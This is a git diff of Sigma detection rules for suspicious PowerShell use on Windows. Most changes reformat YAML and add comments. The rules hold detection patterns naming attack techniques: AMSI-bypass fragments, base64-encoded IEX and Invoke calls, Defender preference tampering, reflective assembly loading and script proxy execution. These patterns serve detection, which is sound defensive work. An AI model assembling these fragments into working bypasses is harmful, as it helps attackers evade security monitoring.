related: - - id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429 - type: similar + - id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429 + type: similar status: experimental -description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. - Notable capabilities could be "OpenSSH" and others. +description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. references: - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content @@ -22,19 +21,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: Add-WindowsCapability + CommandLine|contains: Add-WindowsCapability selection_capa: - CommandLine|contains: OpenSSH. + CommandLine|contains: OpenSSH. # For both "OpenSSH.Server" and "OpenSSH.Client" condition: process_creation and (all of selection_*) falsepositives: - - Legitimate usage of the capabilities by administrators or users. Add additional - filters accordingly. + - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml index d37eb1f0f..7d9d02fc4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml @@ -1,11 +1,10 @@ title: Potential AMSI Bypass Via .NET Reflection id: 30edb182-aa75-42c0-b0a9-e998bb29067c related: - - id: 4f927692-68b5-4267-871b-073c45f4f6fe - type: obsoletes + - id: 4f927692-68b5-4267-871b-073c45f4f6fe + type: obsoletes status: test -description: Detects Request to "amsiInitFailed" that can be used to disable AMSI - Scanning +description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning references: - https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/ - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ @@ -23,11 +22,11 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - System.Management.Automation.AmsiUtils - amsiInitFailed selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - '[Ref].Assembly.GetType' - SetValue($null,$true) - NonPublic,Static diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml index 2d5c1f030..b18f5a8b7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml @@ -1,11 +1,10 @@ title: Potential AMSI Bypass Using NULL Bits id: 92a974db-ab84-457f-9ec0-55db83d7a825 related: - - id: fa2559c8-1197-471d-9cdd-05a0273d4522 - type: similar + - id: fa2559c8-1197-471d-9cdd-05a0273d4522 + type: similar status: experimental -description: Detects usage of special strings/null bits in order to potentially bypass - AMSI functionalities +description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities references: - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi author: Nasreddine Bencherchali (Nextron Systems) @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - if(0){{{0}}}' -f $(0 -as [char]) + - '#' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_audio_capture.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_audio_capture.yml index f5a17f61e..b51993490 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_audio_capture.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_audio_capture.yml @@ -6,8 +6,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md - https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html - https://github.com/frgnca/AudioDeviceCmdlets -author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, - Nasreddine Bencherchali (Nextron Systems) +author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/24 modified: 2023/04/06 tags: @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - WindowsAudioDevice-Powershell-Cmdlet - Toggle-AudioDevice - 'Get-AudioDevice ' diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml index b85f034f1..9a8bac831 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml @@ -1,12 +1,10 @@ title: Suspicious Encoded PowerShell Command Line id: ca2092a1-c273-4878-9b4b-0d60115bf5ea status: test -description: Detects suspicious powershell process starts with base64 encoded commands - (e.g. Emotet) +description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) references: - https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - Anton Kutepov, oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community date: 2018/09/03 modified: 2023/04/06 tags: @@ -20,16 +18,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_enc: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' # covers -en and -enc selection_cli_content: - CommandLine|contains: + CommandLine|contains: - ' JAB' - ' SUVYI' - ' SQBFAFgA' @@ -40,12 +38,11 @@ detection: - ' UwB' - ' cwB' selection_standalone: - CommandLine|contains: + CommandLine|contains: - '.exe -ENCOD ' - - ' BA^J e-' + - ' BA^J e-' # Reversed filter_optional_remote_signed: - CommandLine|contains: ' -ExecutionPolicy remotesigned ' - condition: process_creation and (selection_img and (all of selection_cli_* or - selection_standalone) and not 1 of filter_optional_*) + CommandLine|contains: ' -ExecutionPolicy remotesigned ' + condition: process_creation and (selection_img and (all of selection_cli_* or selection_standalone) and not 1 of filter_optional_*) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_frombase64string.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_frombase64string.yml index d169a1df3..4bb1ae8ee 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_frombase64string.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_frombase64string.yml @@ -1,8 +1,7 @@ title: PowerShell Base64 Encoded FromBase64String Cmdlet id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c status: test -description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process - command line +description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line references: - Internal Research author: Florian Roth (Nextron Systems) @@ -21,11 +20,12 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|base64offset|contains: ::FromBase64String - - CommandLine|contains: - - OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA - - oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA - - 6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw + - CommandLine|base64offset|contains: ::FromBase64String + # UTF-16 LE + - CommandLine|contains: + - OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA + - oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA + - 6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_iex.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_iex.yml index 19d2a28d0..6b94d1774 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_iex.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_iex.yml @@ -18,30 +18,31 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|base64offset|contains: - - IEX ([ - - iex ([ - - iex (New - - IEX (New - - IEX([ - - iex([ - - iex(New - - IEX(New - - IEX((' - - iex((' - - CommandLine|contains: - - SQBFAFgAIAAoAFsA - - kARQBYACAAKABbA - - JAEUAWAAgACgAWw - - aQBlAHgAIAAoAFsA - - kAZQB4ACAAKABbA - - pAGUAeAAgACgAWw - - aQBlAHgAIAAoAE4AZQB3A - - kAZQB4ACAAKABOAGUAdw - - pAGUAeAAgACgATgBlAHcA - - SQBFAFgAIAAoAE4AZQB3A - - kARQBYACAAKABOAGUAdw - - JAEUAWAAgACgATgBlAHcA + - CommandLine|base64offset|contains: + - IEX ([ + - iex ([ + - iex (New + - IEX (New + - IEX([ + - iex([ + - iex(New + - IEX(New + - IEX((' + - iex((' + # UTF16 LE + - CommandLine|contains: + - SQBFAFgAIAAoAFsA + - kARQBYACAAKABbA + - JAEUAWAAgACgAWw + - aQBlAHgAIAAoAFsA + - kAZQB4ACAAKABbA + - pAGUAeAAgACgAWw + - aQBlAHgAIAAoAE4AZQB3A + - kAZQB4ACAAKABOAGUAdw + - pAGUAeAAgACgATgBlAHcA + - SQBFAFgAIAAoAE4AZQB3A + - kARQBYACAAKABOAGUAdw + - JAEUAWAAgACgATgBlAHcA condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_invoke.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_invoke.yml index c77e42e5a..494fdaa2b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_invoke.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_invoke.yml @@ -1,8 +1,8 @@ title: PowerShell Base64 Encoded Invoke Keyword id: 6385697e-9f1b-40bd-8817-f4a91f40508e related: - - id: fd6e2919-3936-40c9-99db-0aa922c356f7 - type: obsoletes + - id: fd6e2919-3936-40c9-99db-0aa922c356f7 + type: obsoletes status: test description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls references: @@ -23,19 +23,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_enc: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' selection_cli_invoke: - CommandLine|contains: + CommandLine|contains: + # Invoke- + # UTF-16LE - SQBuAHYAbwBrAGUALQ - kAbgB2AG8AawBlAC0A - JAG4AdgBvAGsAZQAtA + # UTF-8 - SW52b2tlL - ludm9rZS - JbnZva2Ut diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_mppreference.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_mppreference.yml index 19c858a19..4774c5290 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_mppreference.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_mppreference.yml @@ -1,8 +1,7 @@ title: Powershell Base64 Encoded MpPreference Cmdlet id: c6fb44c6-71f5-49e6-9462-1425d328aee3 status: test -description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries - to modifies or tamper with Windows Defender AV +description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV references: - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md @@ -21,24 +20,25 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|base64offset|contains: - - 'Add-MpPreference ' - - 'Set-MpPreference ' - - 'add-mppreference ' - - 'set-mppreference ' - - CommandLine|contains: - - QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA - - EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA - - BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA - - UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA - - MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA - - TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA - - YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA - - EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA - - hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA - - cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA - - MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA - - zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA + - CommandLine|base64offset|contains: + - 'Add-MpPreference ' + - 'Set-MpPreference ' + - 'add-mppreference ' + - 'set-mppreference ' + - CommandLine|contains: + # UTF16-LE + - QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA + - EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA + - BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA + - UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA + - MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA + - TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA + - YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA + - EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA + - hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA + - cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA + - MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA + - zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml index 4c382cc9e..9d77529a1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml @@ -1,8 +1,8 @@ title: PowerShell Base64 Encoded Reflective Assembly Load id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 related: - - id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 - type: similar + - id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 + type: similar status: test description: Detects base64 encoded .NET reflective loading of Assembly references: @@ -25,16 +25,20 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # [Reflection.Assembly]::Load( - WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA - sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA - bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA + # [reflection.assembly]::("Load") - AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC - BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp - AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK + # [Reflection.Assembly]::("Load") - WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ - sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA - bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA + # [reflection.assembly]::Load( - WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA - sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA - bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml index 2dca9f6f2..7522a6914 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml @@ -1,11 +1,10 @@ title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 related: - - id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 - type: similar + - id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 + type: similar status: test -description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used - in .NET "reflection.assembly" +description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ @@ -26,22 +25,28 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # ::("L"+"oad") - OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ - oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA - 6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA + # ::("Lo"+"ad") - OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ - oAOgAoACIATABvACIAKwAiAGEAZAAiACkA - 6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA + # ::("Loa"+"d") - OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ - oAOgAoACIATABvAGEAIgArACIAZAAiACkA - 6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA + # ::('L'+'oad') - OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ - oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA - 6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA + # ::('Lo'+'ad') - OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ - oAOgAoACcATABvACcAKwAnAGEAZAAnACkA - 6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA + # ::('Loa'+'d') - OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ - oAOgAoACcATABvAGEAJwArACcAZAAnACkA - 6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml index 559b8659e..0f35792a1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml @@ -1,11 +1,10 @@ title: PowerShell Base64 Encoded WMI Classes id: 1816994b-42e1-4fb1-afd2-134d88184f71 related: - - id: 47688f1b-9f51-4656-b013-3cc49a166a36 - type: obsoletes + - id: 47688f1b-9f51-4656-b013-3cc49a166a36 + type: obsoletes status: test -description: Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", - "Win32_ScheduledJob", etc. +description: Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", "Win32_ScheduledJob", etc. references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -23,14 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_shadowcopy: - CommandLine|contains: + # Win32_Shadowcopy + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ - cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA - XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A @@ -38,7 +38,8 @@ detection: - dpbjMyX1NoYWRvd2NvcH - XaW4zMl9TaGFkb3djb3B5 selection_cli_scheduledJob: - CommandLine|contains: + # Win32_ScheduledJob + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA - cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA - XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg @@ -46,7 +47,8 @@ detection: - dpbjMyX1NjaGVkdWxlZEpvY - XaW4zMl9TY2hlZHVsZWRKb2 selection_cli_process: - CommandLine|contains: + # Win32_Process + CommandLine|contains: - VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw - cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA - XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA @@ -54,7 +56,8 @@ detection: - dpbjMyX1Byb2Nlc3 - XaW4zMl9Qcm9jZXNz selection_cli_useraccount: - CommandLine|contains: + # Win32_UserAccount + CommandLine|contains: - VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A - cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA - XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA @@ -62,7 +65,8 @@ detection: - dpbjMyX1VzZXJBY2NvdW50 - XaW4zMl9Vc2VyQWNjb3Vud selection_cli_loggedonuser: - CommandLine|contains: + # Win32_LoggedOnUser + CommandLine|contains: - VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA - cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA - XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_invocation.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_invocation.yml index 13cb35f97..e4976f366 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_invocation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_invocation.yml @@ -1,8 +1,7 @@ title: Potential Process Execution Proxy Via CL_Invocation.ps1 id: a0459f02-ac51-4c09-b511-b8c9203fc429 status: test -description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" - script to proxy execution using "System.Diagnostics.Process" +description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" references: - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/ - https://twitter.com/bohops/status/948061991012327424 @@ -20,7 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: 'SyncInvoke ' + # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example. + CommandLine|contains: 'SyncInvoke ' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_loadassembly.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_loadassembly.yml index cbc842a85..c9a4831e7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_loadassembly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_loadassembly.yml @@ -1,9 +1,7 @@ title: Assembly Loading Via CL_LoadAssembly.ps1 id: c57872c7-614f-4d7f-a40d-b78c8df2d30d status: experimental -description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that - are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different - assemblies and bypass App locker controls. +description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. references: - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ - https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/ @@ -21,7 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example. + CommandLine|contains: - 'LoadAssemblyFromPath ' - 'LoadAssemblyFromNS ' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml index 9894e8e82..ccbbfa81a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml @@ -1,12 +1,10 @@ title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 id: 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d status: experimental -description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to - proxy the execution of additional PowerShell script commands +description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands references: - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ -author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, - frack113 +author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113 date: 2022/05/21 modified: 2023/08/17 tags: @@ -20,13 +18,15 @@ detection: EventID: 4688 Channel: Security selection_pwsh: - CommandLine|contains: ' -nologo -windowstyle minimized -file ' + CommandLine|contains: ' -nologo -windowstyle minimized -file ' ParentProcessName|endswith: + # Note: to avoid potential FPs we assume the script was launched from powershell. But in theory it can be launched by any Powershell like process - \powershell.exe - \pwsh.exe - NewProcessName|endswith: \powershell.exe + NewProcessName|endswith: \powershell.exe selection_temp: - CommandLine|contains: + # Note: Since the function uses "env:temp" the value will change depending on the context of exec + CommandLine|contains: - \AppData\Local\Temp\ - \Windows\Temp\ condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml index a942a8eb4..22c41783f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml @@ -1,8 +1,7 @@ title: ConvertTo-SecureString Cmdlet Usage Via CommandLine id: 74403157-20f5-415d-89a7-c505779585cf status: test -description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. - Which is fairly uncommon and could indicate potential suspicious activity +description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: ConvertTo-SecureString + CommandLine|contains: ConvertTo-SecureString 